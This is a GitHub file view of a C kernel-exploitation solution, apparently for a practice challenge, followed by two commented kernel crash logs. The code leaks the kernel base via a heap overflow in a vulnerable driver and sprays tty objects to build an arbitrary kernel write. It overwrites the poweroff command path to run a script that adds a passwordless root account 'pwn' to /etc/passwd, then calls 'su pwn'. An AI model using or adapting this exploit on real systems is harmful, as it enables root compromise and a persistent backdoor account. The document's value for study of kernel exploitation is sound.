-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpwnable_lk01-2_exploit.c
More file actions
191 lines (152 loc) · 6.55 KB
/
pwnable_lk01-2_exploit.c
File metadata and controls
191 lines (152 loc) · 6.55 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
/* 0xffffffff810477f7 : mov qword ptr [rdx], rcx ; ret */
#define module "/dev/holstein"
#define base_no_kaslr 0xffffffff81000000
#define modprobe 0xffffffff81e38180 // /sbin/modprobe
#define poweroff (kbase + 0xe379c0) // /sbin/poweroff
#define orderly_poweroff (kbase + 0x750e4)
#define orderly_reboot (kbase + 0x750e0)
#define mov_qword_rdx_rcx 0xffffffff810477f7
unsigned long kbase, g_buf;
int fd;
int spray[100];
char buf[0x500];
unsigned long offsetter(unsigned long addr){return kbase + (addr - base_no_kaslr);}
void arb_write(unsigned long address, unsigned int value){
unsigned long *writer = (unsigned long*)&buf;
writer[12] = offsetter(mov_qword_rdx_rcx);
*(unsigned long*)&buf[0x418] = g_buf;
write(fd, buf, 0x420);
for (int i=0; i<100; i++){ioctl(spray[i], value, address);}
}
bool valid(unsigned long addr){return addr % 0x100000;}
int main(){
for(int i=0;i<50;i++){
spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
if (spray[i] == -1){perror("/dev/ptmx"); exit(1);}
}
fd = open(module, O_RDWR);
if (fd < 0){perror("Can't open module \n");exit(1);}
printf("Module Opened \n");
for(int i=50;i<100;i++){
spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
if (spray[i] == -1){perror("/dev/ptmx"); exit(1);}
}
read(fd, buf, 0x500);
kbase = *(unsigned long*)&buf[0x418] - 0xc38880;
if (valid(kbase) != 0){perror("Not a good leak\n"), exit(-1);}
g_buf = *(unsigned long*)&buf[0x438] - 0x438;
printf("Kernel Base: %lx \n", kbase);
printf("g_buf: %lx \n", g_buf);
system("echo -e '#!/bin/sh\necho \"pwn::0:0:root:/root:/bin/sh\" >> /etc/passwd' > /tmp/manz.sh");
system("chmod +x /tmp/manz.sh");
char bad[] = "/tmp/manz.sh";
for (int i=0; i<sizeof(bad); i=i+4){
unsigned long add = poweroff + i;
printf("Iteration %d: addr = %lx, value = %x\n", i / 4, add , *(unsigned int*)&bad[i]);
fflush(stdout);
arb_write(add , *(unsigned int*)&bad[i]);
}
printf("[+] Done Overwriting\n");
fflush(stdout);
unsigned long *w = (unsigned long*)&buf;
w[12] = orderly_reboot;
*(unsigned long*)&buf[0x418] = g_buf;
write(fd, buf, 0x420);
for (int i=0; i < 100; i++) {ioctl(spray[i], 0xdeadbeef, NULL);}
system("su pwn");
close(fd);
return 0;
}
/* First crash
BUG: unable to handle page fault for address: ffffffffdead0c00
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 340d067 P4D 340d067 PUD 340f067 PMD 0
Oops: 0010 [#1] SMP PTI
CPU: 0 PID: 178 Comm: exploit Tainted: G O 5.15.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:0xffffffffdead0c00
Code: Unable to access opcode bytes at RIP 0xffffffffdead0bd6.
RSP: 0018:ffffb0f800197e10 EFLAGS: 00000286
RAX: ffffffffdead0c00 RBX: ffff998e81ce1c00 RCX: 00000000deadbeef
RDX: 00000000cafebabe RSI: 00000000deadbeef RDI: ffff998e81ce1800
RBP: ffffb0f800197ea8 R08: 00000000cafebabe R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000deadbeef
R13: ffff998e81ce1800 R14: 00000000cafebabe R15: ffff998e81d41300
FS: 0000000000408e38(0000) GS:ffff998e82400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffdead0bd6 CR3: 0000000001be4000 CR4: 00000000003006f0
Call Trace:
? tty_ioctl+0x38a/0x920
? _copy_from_user+0x2e/0x60
? module_write+0x10d/0x135 [vuln]
__x64_sys_ioctl+0x3c3/0x8f0
? vfs_write+0xa5/0x260
? ksys_write+0x53/0xd0
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
*/
/* Second Crash
Iteration 0: addr = ffffffff88a379c0, value = 706d742f
Iteration 1: addr = ffffffff88a379c4, value = 6e616d2f
Iteration 2: addr = ffffffff88a379c8, value = 68732e7a
Iteration 3: addr = ffffffff88a379cc, value = ce29fd00
BUG: unable to handle page fault for address: ffffffff810750e4
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 340d067 P4D 340d067 PUD 340e063 PMD 0
Oops: 0010 [#1] SMP PTI
CPU: 0 PID: 165 Comm: exploit Tainted: G O 5.15.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:0xffffffff810750e4
Code: Unable to access opcode bytes at RIP 0xffffffff810750ba.
RSP: 0018:ffffb28cc0187e10 EFLAGS: 00000286
RAX: ffffffff810750e4 RBX: ffff98c0c1cffc00 RCX: 00000000cafebabe
RDX: 0000000000000000 RSI: 00000000cafebabe RDI: ffff98c0c1cff800
RBP: ffffb28cc0187ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000cafebabe
R13: ffff98c0c1cff800 R14: 0000000000000000 R15: ffff98c0c1ce9700
FS: 0000000000409e78(0000) GS:ffff98c0c2400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff810750ba CR3: 0000000001b84000 CR4: 00000000003006f0
Call Trace:
? tty_ioctl+0x38a/0x920
? _copy_from_user+0x2e/0x60
? module_write+0x10d/0x135 [vuln]
__x64_sys_ioctl+0x3c3/0x8f0
? vfs_write+0xa5/0x260
? ksys_write+0x53/0xd0
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x401b15
Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 10 00 00 00 48 89 44 24 08 48 8d 44 24 20 48 89 44 24 10 b8 10 00 00 00 0f 05 <48> 63 f8 e8 73 ff ff ff 48 8b 54 24 18 64 48 2b 14 25 28 00 00 00
RSP: 002b:00007ffe8435b0e0 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00000000004012bd RCX: 0000000000401b15
RDX: 0000000000000000 RSI: ffffffffcafebabe RDI: 0000000000000036
RBP: 00007ffe8435b160 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffe8435b1e8
R13: 00007ffe8435b1f8 R14: 0000000000000000 R15: 0000000000000000
Modules linked in: vuln(O)
CR2: ffffffff810750e4
---[ end trace 7892d13966c73b7d ]---
RIP: 0010:0xffffffff810750e4
Code: Unable to access opcode bytes at RIP 0xffffffff810750ba.
RSP: 0018:ffffb28cc0187e10 EFLAGS: 00000286
RAX: ffffffff810750e4 RBX: ffff98c0c1cffc00 RCX: 00000000cafebabe
RDX: 0000000000000000 RSI: 00000000cafebabe RDI: ffff98c0c1cff800
RBP: ffffb28cc0187ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000cafebabe
R13: ffff98c0c1cff800 R14: 0000000000000000 R15: ffff98c0c1ce9700
FS: 0000000000409e78(0000) GS:ffff98c0c2400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff810750ba CR3: 0000000001b84000 CR4: 00000000003006f0
Kernel panic - not syncing: Fatal exception
Kernel Offset: 0x6c00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
*/